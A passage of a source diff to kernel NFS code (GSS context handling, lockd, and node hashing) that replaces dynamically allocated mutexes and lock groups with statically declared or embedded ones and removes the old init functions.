*/ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (error) { cp->gss_clnt_flags |= GSS_CTX_INVAL; } @@ -1556,7 +1549,7 @@ nfsmout: cp->gss_clnt_flags &= ~GSS_NEEDCTX; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); NFS_GSS_DBG("Returning error = %d\n", error); return error; @@ -1620,7 +1613,7 @@ bad: /* * Give up on this context */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= GSS_CTX_INVAL; /* @@ -1631,7 +1624,7 @@ bad: cp->gss_clnt_flags &= ~GSS_NEEDCTX; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); return error; } @@ -2214,7 +2207,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req) * sequence number window to indicate it's done. * We do this even if the request timed out. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); gsp = SLIST_FIRST(&req->r_gss_seqlist); if (gsp && gsp->gss_seqnum > (cp->gss_clnt_seqnum - cp->gss_clnt_seqwin)) { win_resetbit(cp->gss_clnt_seqbits, @@ -2239,7 +2232,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req) cp->gss_clnt_flags &= ~GSS_NEEDSEQ; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } /* @@ -2251,9 +2244,9 @@ nfs_gss_clnt_ctx_ref(struct nfsreq *req, struct nfs_gss_clnt_ctx *cp) { req->r_gss_ctx = cp; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } /* @@ -2278,7 +2271,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req) req->r_gss_ctx = NULL; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (--cp->gss_clnt_refcnt < 0) { panic("Over release of gss context!\n"); } @@ -2305,7 +2298,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req) cp->gss_clnt_nctime = now.tv_sec; neg_cache = 1; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (destroy) { NFS_GSS_DBG("Destroying context 
%s\n", NFS_GSS_CTX(req, cp)); if (nmp) { @@ -2364,12 +2357,12 @@ nfs_gss_clnt_ctx_neg_cache_reap(struct nfsmount *nmp) continue; } /* Not referenced, remove it. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_refcnt == 0) { cp->gss_clnt_flags |= GSS_CTX_DESTROY; destroy = 1; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (destroy) { TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); nmp->nm_ncentries++; @@ -2460,7 +2453,7 @@ nfs_gss_clnt_ctx_copy(struct nfs_gss_clnt_ctx *scp, struct nfs_gss_clnt_ctx **dc return ENOMEM; } bzero(dcp, sizeof(struct nfs_gss_clnt_ctx)); - dcp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL); + lck_mtx_init(&dcp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL); dcp->gss_clnt_cred = scp->gss_clnt_cred; kauth_cred_ref(dcp->gss_clnt_cred); dcp->gss_clnt_prinlen = scp->gss_clnt_prinlen; @@ -2500,10 +2493,8 @@ nfs_gss_clnt_ctx_destroy(struct nfs_gss_clnt_ctx *cp) host_release_special_port(cp->gss_clnt_mport); cp->gss_clnt_mport = IPC_PORT_NULL; - if (cp->gss_clnt_mtx) { - lck_mtx_destroy(cp->gss_clnt_mtx, nfs_gss_clnt_grp); - cp->gss_clnt_mtx = (lck_mtx_t *)NULL; - } + lck_mtx_destroy(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp); + if (IS_VALID_CRED(cp->gss_clnt_cred)) { kauth_cred_unref(&cp->gss_clnt_cred); } @@ -2550,9 +2541,9 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req) } nmp = req->r_nmp; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_INVAL) { - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); return 0; // already being renewed } @@ -2563,7 +2554,7 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req) cp->gss_clnt_flags &= ~GSS_NEEDSEQ; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (cp->gss_clnt_proc == RPCSEC_GSS_DESTROY) { return EACCES; /* Destroying a context is best effort. Don't renew. 
*/ @@ -2623,13 +2614,13 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp) while ((cp = TAILQ_FIRST(&nmp->nm_gsscl))) { TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); cp->gss_clnt_entries.tqe_next = NFSNOLIST; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); req->r_gss_ctx = cp; lck_mtx_unlock(&nmp->nm_lock); @@ -2659,9 +2650,9 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp) * the reference to remove it if its * refcount is zero. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); lck_mtx_lock(&nmp->nm_lock); } @@ -2687,19 +2678,19 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred) NFS_GSS_CLNT_CTX_DUMP(nmp); lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) { if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %d/%d. 
refcnt = %d continuing\n", kauth_cred_getasid(cp->gss_clnt_cred), kauth_cred_getauid(cp->gss_clnt_cred), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } cp->gss_clnt_refcnt++; cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); req->r_gss_ctx = cp; lck_mtx_unlock(&nmp->nm_lock); /* @@ -2714,7 +2705,7 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred) NFS_ZFREE(nfs_req_zone, req); return 0; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } lck_mtx_unlock(&nmp->nm_lock); @@ -2783,20 +2774,20 @@ nfs_gss_clnt_ctx_get_principal(struct nfsmount *nmp, vfs_context_t ctx, req->r_nmp = nmp; lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) { cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); goto out; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } out: @@ -2876,7 +2867,7 @@ nfs_gss_svc_ctx_find(uint32_t handle) */ clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &timenow); - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); LIST_FOREACH(cp, head, gss_svc_entries) { if (cp->gss_svc_handle == handle) { @@ -2896,14 +2887,14 @@ nfs_gss_svc_ctx_find(uint32_t handle) cp = NULL; break; } - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); cp->gss_svc_refcnt++; - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); break; } } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + 
lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); return cp; } @@ -2918,7 +2909,7 @@ nfs_gss_svc_ctx_insert(struct nfs_gss_svc_ctx *cp) struct nfs_gss_svc_ctx_hashhead *head; struct nfs_gss_svc_ctx *p; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); /* * Give the client a random handle so that if we reboot @@ -2948,7 +2939,7 @@ retry: min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC); } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } /* @@ -2964,7 +2955,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) int contexts = 0; int i; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); clock_get_uptime(&timenow); NFS_GSS_DBG("is running\n"); @@ -2990,7 +2981,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) if (cp->gss_svc_seqbits) { FREE(cp->gss_svc_seqbits, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); contexts--; } @@ -3009,7 +3000,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC); } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } /* @@ -3094,7 +3085,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc) error = ENOMEM; goto nfsmout; } - cp->gss_svc_mtx = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL); + lck_mtx_init(&cp->gss_svc_mtx, &nfs_gss_svc_grp, LCK_ATTR_NULL); cp->gss_svc_refcnt = 1; } else { /* @@ -3328,7 +3319,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc) } if (error) { if (proc == RPCSEC_GSS_INIT) { - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); cp = NULL; } @@ -3571,10 +3562,10 @@ nfs_gss_svc_ctx_init(struct nfsrv_descript *nd, 
struct nfsrv_sock *slp, mbuf_t * cp = nfs_gss_svc_ctx_find(cp->gss_svc_handle); if (cp != NULL) { cp->gss_svc_handle = 0; // so it can't be found - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &cp->gss_svc_incarnation); - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); } break; default: @@ -3621,7 +3612,7 @@ nfsmout: if (cp->gss_svc_token != NULL) { FREE(cp->gss_svc_token, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); } @@ -3778,7 +3769,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) uint32_t win = cp->gss_svc_seqwin; uint32_t i; - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); /* * If greater than the window upper bound, @@ -3794,7 +3785,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) } win_setbit(bits, seq % win); cp->gss_svc_seqmax = seq; - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 1; } @@ -3802,7 +3793,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) * Invalid if below the lower bound of the window */ if (seq <= cp->gss_svc_seqmax - win) { - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 0; } @@ -3810,11 +3801,11 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) * In the window, invalid if the bit is already set */ if (win_getbit(bits, seq % win)) { - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 0; } win_setbit(bits, seq % win); - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 1; } @@ -3828,13 +3819,13 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) void nfs_gss_svc_ctx_deref(struct nfs_gss_svc_ctx *cp) { - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); if (cp->gss_svc_refcnt > 0) { cp->gss_svc_refcnt--; } else 
{ printf("nfs_gss_ctx_deref: zero refcount\n"); } - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); } /* @@ -3847,7 +3838,7 @@ nfs_gss_svc_cleanup(void) struct nfs_gss_svc_ctx *cp, *ncp; int i; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); /* * Run through all the buckets @@ -3862,12 +3853,12 @@ nfs_gss_svc_cleanup(void) if (cp->gss_svc_seqbits) { FREE(cp->gss_svc_seqbits, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); } } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } #endif /* CONFIG_NFS_SERVER */ diff --git a/bsd/nfs/nfs_gss.h b/bsd/nfs/nfs_gss.h index 01aaabee7..05680ef89 100644 --- a/bsd/nfs/nfs_gss.h +++ b/bsd/nfs/nfs_gss.h @@ -85,7 +85,7 @@ extern u_char krb5_mech_oid[11]; * The client's RPCSEC_GSS context information */ struct nfs_gss_clnt_ctx { - lck_mtx_t *gss_clnt_mtx; + lck_mtx_t gss_clnt_mtx; thread_t gss_clnt_thread; // Thread creating context TAILQ_ENTRY(nfs_gss_clnt_ctx) gss_clnt_entries; uint32_t gss_clnt_flags; // Flag bits - see below @@ -135,7 +135,7 @@ struct nfs_gss_clnt_ctx { * The server's RPCSEC_GSS context information */ struct nfs_gss_svc_ctx { - lck_mtx_t *gss_svc_mtx; + lck_mtx_t gss_svc_mtx; LIST_ENTRY(nfs_gss_svc_ctx) gss_svc_entries; uint32_t gss_svc_handle; // Identifies server context to client uint32_t gss_svc_refcnt; // Reference count diff --git a/bsd/nfs/nfs_lock.c b/bsd/nfs/nfs_lock.c index 4b0d19631..5872d1840 100644 --- a/bsd/nfs/nfs_lock.c +++ b/bsd/nfs/nfs_lock.c @@ -103,13 +103,14 @@ extern void ipc_port_release_send(ipc_port_t); * kept sorted by transaction ID (xid). 
*/ static uint64_t nfs_lockxid = 0; -static LOCKD_MSG_QUEUE nfs_pendlockq; +static LOCKD_MSG_QUEUE nfs_pendlockq = TAILQ_HEAD_INITIALIZER(nfs_pendlockq); /* list of mounts that are (potentially) making lockd requests */ -TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list; +TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list = + TAILQ_HEAD_INITIALIZER(nfs_lockd_mount_list); -static lck_grp_t *nfs_lock_lck_grp; -static lck_mtx_t *nfs_lock_mutex; +static LCK_GRP_DECLARE(nfs_lock_lck_grp, "nfs_lock"); +static LCK_MTX_DECLARE(nfs_lock_mutex, &nfs_lock_lck_grp); void nfs_lockdmsg_enqueue(LOCKD_MSG_REQUEST *); void nfs_lockdmsg_dequeue(LOCKD_MSG_REQUEST *); @@ -119,29 +120,16 @@ LOCKD_MSG_REQUEST *nfs_lockdmsg_find_by_xid(uint64_t); uint64_t nfs_lockxid_get(void); int nfs_lockd_send_request(LOCKD_MSG *, int); -/* - * initialize global nfs lock state - */ -void -nfs_lockinit(void) -{ - TAILQ_INIT(&nfs_pendlockq); - TAILQ_INIT(&nfs_lockd_mount_list); - - nfs_lock_lck_grp = lck_grp_alloc_init("nfs_lock", LCK_GRP_ATTR_NULL); - nfs_lock_mutex = lck_mtx_alloc_init(nfs_lock_lck_grp, LCK_ATTR_NULL); -} - /* * Register a mount as (potentially) making lockd requests. 
*/ void nfs_lockd_mount_register(struct nfsmount *nmp) { - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); TAILQ_INSERT_HEAD(&nfs_lockd_mount_list, nmp, nm_ldlink); nfs_lockd_mounts++; - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); } /* @@ -157,9 +145,9 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp) mach_port_t lockd_port = IPC_PORT_NULL; kern_return_t kr; - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); if (nmp->nm_ldlink.tqe_next == NFSNOLIST) { - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return; } @@ -174,7 +162,7 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp) nfs_lockd_request_sent = 0; } - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); if (!send_shutdown) { return; @@ -463,7 +451,7 @@ nfs3_lockd_request( interruptable = NMFLAG(nmp, INTR); lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); /* allocate unique xid */ msg->lm_xid = nfs_lockxid_get(); @@ -475,9 +463,9 @@ nfs3_lockd_request( nfs_lockd_request_sent = 1; /* need to drop nfs_lock_mutex while calling nfs_lockd_send_request() */ - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); error = nfs_lockd_send_request(msg, interruptable); - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); if (error && error != EAGAIN) { break; } @@ -507,7 +495,7 @@ wait_for_granted: while (now.tv_sec < endtime) { error = error2 = 0; if (!msgreq->lmr_answered) { - error = msleep(msgreq, nfs_lock_mutex, slpflag | PUSER, "lockd", &ts); + error = msleep(msgreq, &nfs_lock_mutex, slpflag | PUSER, "lockd", &ts); slpflag = 0; } if (msgreq->lmr_answered) { @@ -736,7 +724,7 @@ wait_for_granted: * for this mount. 
*/ nfs_lockdmsg_dequeue(msgreq); - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); lck_mtx_lock(&nmp->nm_lock); if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) { nmp->nm_lockmode = NFS_LOCK_MODE_DISABLED; @@ -763,7 +751,7 @@ wait_for_granted: nfs_lockdmsg_dequeue(msgreq); - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return error; } @@ -941,7 +929,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) return EINVAL; } - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); /* try to find the lockd message by transaction id (cookie) */ msgreq = nfs_lockdmsg_find_by_xid(ansp->la_xid); @@ -964,7 +952,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) } } if (!msgreq) { - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return EPIPE; } @@ -988,7 +976,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) } msgreq->lmr_answered = 1; - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); wakeup(msgreq); return 0; @@ -1029,7 +1017,7 @@ nfslockdnotify(proc_t p, user_addr_t argp) argp += headsize; saddr = (struct sockaddr *)&ln.ln_addr[0]; - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); for (i = 0; i < ln.ln_addrcount; i++) { error = copyin(argp, &ln.ln_addr[0], sizeof(ln.ln_addr[0])); @@ -1050,7 +1038,7 @@ nfslockdnotify(proc_t p, user_addr_t argp) } } - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return error; } diff --git a/bsd/nfs/nfs_lock.h b/bsd/nfs/nfs_lock.h index b360849e6..7e4b07590 100644 --- a/bsd/nfs/nfs_lock.h +++ b/bsd/nfs/nfs_lock.h @@ -144,7 +144,6 @@ struct lockd_notify { #ifdef KERNEL -void nfs_lockinit(void); void nfs_lockd_mount_register(struct nfsmount *); void nfs_lockd_mount_unregister(struct nfsmount *); int nfs3_lockd_request(nfsnode_t, int, LOCKD_MSG_REQUEST *, int, thread_t); diff --git a/bsd/nfs/nfs_node.c b/bsd/nfs/nfs_node.c index c47fa9263..84745f933 100644 --- a/bsd/nfs/nfs_node.c +++ b/bsd/nfs/nfs_node.c @@ -93,37 +93,24 @@ 
static LIST_HEAD(nfsnodehashhead, nfsnode) * nfsnodehashtbl; static u_long nfsnodehash; -static lck_grp_t *nfs_node_hash_lck_grp; -static lck_grp_t *nfs_node_lck_grp; -static lck_grp_t *nfs_data_lck_grp; -lck_mtx_t *nfs_node_hash_mutex; +static LCK_GRP_DECLARE(nfs_node_hash_lck_grp, "nfs_node_hash"); +static LCK_GRP_DECLARE(nfs_node_lck_grp, "nfs_node"); +static LCK_GRP_DECLARE(nfs_data_lck_grp, "nfs_data"); +LCK_MTX_DECLARE(nfs_node_hash_mutex, &nfs_node_hash_lck_grp); ZONE_DECLARE(nfsnode_zone, "NFS node", sizeof(struct nfsnode), ZC_ZFREE_CLEARMEM); #define NFS_NODE_DBG(...) NFS_DBG(NFS_FAC_NODE, 7, ## __VA_ARGS__) -/* - * Initialize hash links for nfsnodes - * and build nfsnode free list. - */ -void -nfs_nhinit(void) -{ - nfs_node_hash_lck_grp = lck_grp_alloc_init("nfs_node_hash", LCK_GRP_ATTR_NULL); - nfs_node_hash_mutex = lck_mtx_alloc_init(nfs_node_hash_lck_grp, LCK_ATTR_NULL); - nfs_node_lck_grp = lck_grp_alloc_init("nfs_node", LCK_GRP_ATTR_NULL); - nfs_data_lck_grp = lck_grp_alloc_init("nfs_data", LCK_GRP_ATTR_NULL); -} - void nfs_nhinit_finish(void) { - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (!nfsnodehashtbl) { nfsnodehashtbl = hashinit(desiredvnodes, M_NFSNODE, &nfsnodehash); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } /* @@ -226,7 +213,7 @@ nfs_nget( cn_namelen = cnp ? cnp->cn_namelen : 0; nfshash = nfs_hash(fhp, fhsize); loop: - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); nhpp = NFSNOHASH(nfshash); for (np = nhpp->lh_first; np != 0; np = np->n_hash.le_next) { mp2 = (np->n_hflag & NHINIT) ? 
np->n_mount : NFSTOMP(np); @@ -256,13 +243,13 @@ loop: if ((np->n_hflag & NHINIT) || ((np->n_hflag & NHLOCKED) && !(flags & NG_NOCREATE))) { np->n_hflag |= NHLOCKWANT; FSDBG(263, dnp, np, np->n_flag, 0xcace2222); - msleep(np, nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL); + msleep(np, &nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL); FSDBG(263, dnp, np, np->n_flag, 0xcace3333); goto loop; } vp = NFSTOV(np); vid = vnode_vid(vp); - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if ((error = vnode_getwithvid(vp, vid))) { /* * If vnode is being reclaimed or has already @@ -389,7 +376,7 @@ loop: FSDBG(263, mp, dnp, npp, 0xaaaaaaaa); if (flags & NG_NOCREATE) { - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); *npp = 0; FSDBG_BOT(263, dnp, *npp, 0x80000001, ENOENT); return ENOENT; @@ -436,7 +423,7 @@ loop: if (fhsize > NFS_SMALLFH) { MALLOC(np->n_fhp, u_char *, fhsize, M_NFSBIGFH, M_WAITOK); if (!np->n_fhp) { - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); NFS_ZFREE(nfsnode_zone, np); *npp = 0; FSDBG_BOT(263, dnp, *npp, 0x80000002, ENOMEM); @@ -454,13 +441,13 @@ loop: FSDBG(266, 0, np, np->n_flag, np->n_hflag); /* lock the new nfsnode */ - lck_mtx_init(&np->n_lock, nfs_node_lck_grp, LCK_ATTR_NULL); - lck_rw_init(&np->n_datalock, nfs_data_lck_grp, LCK_ATTR_NULL); - lck_mtx_init(&np->n_openlock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&np->n_lock, &nfs_node_lck_grp, LCK_ATTR_NULL); + lck_rw_init(&np->n_datalock, &nfs_data_lck_grp, LCK_ATTR_NULL); + lck_mtx_init(&np->n_openlock, &nfs_open_grp, LCK_ATTR_NULL); lck_mtx_lock(&np->n_lock); /* release lock on hash table */ - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* do initial loading of attributes */ NACLINVALIDATE(np); @@ -469,14 +456,14 @@ loop: if (error) { FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); nfs_node_unlock(np); - lck_mtx_lock(nfs_node_hash_mutex); + 
lck_mtx_lock(&nfs_node_hash_mutex); LIST_REMOVE(np, n_hash); np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (np->n_parent) { if (!vnode_get(np->n_parent)) { vnode_rele(np->n_parent); @@ -484,9 +471,9 @@ loop: } np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); if (np->n_fhsize > NFS_SMALLFH) { FREE(np->n_fhp, M_NFSBIGFH); } @@ -563,14 +550,14 @@ loop: if (error) { FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); nfs_node_unlock(np); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); LIST_REMOVE(np, n_hash); np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (np->n_parent) { if (!vnode_get(np->n_parent)) { vnode_rele(np->n_parent); @@ -578,9 +565,9 @@ loop: } np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, 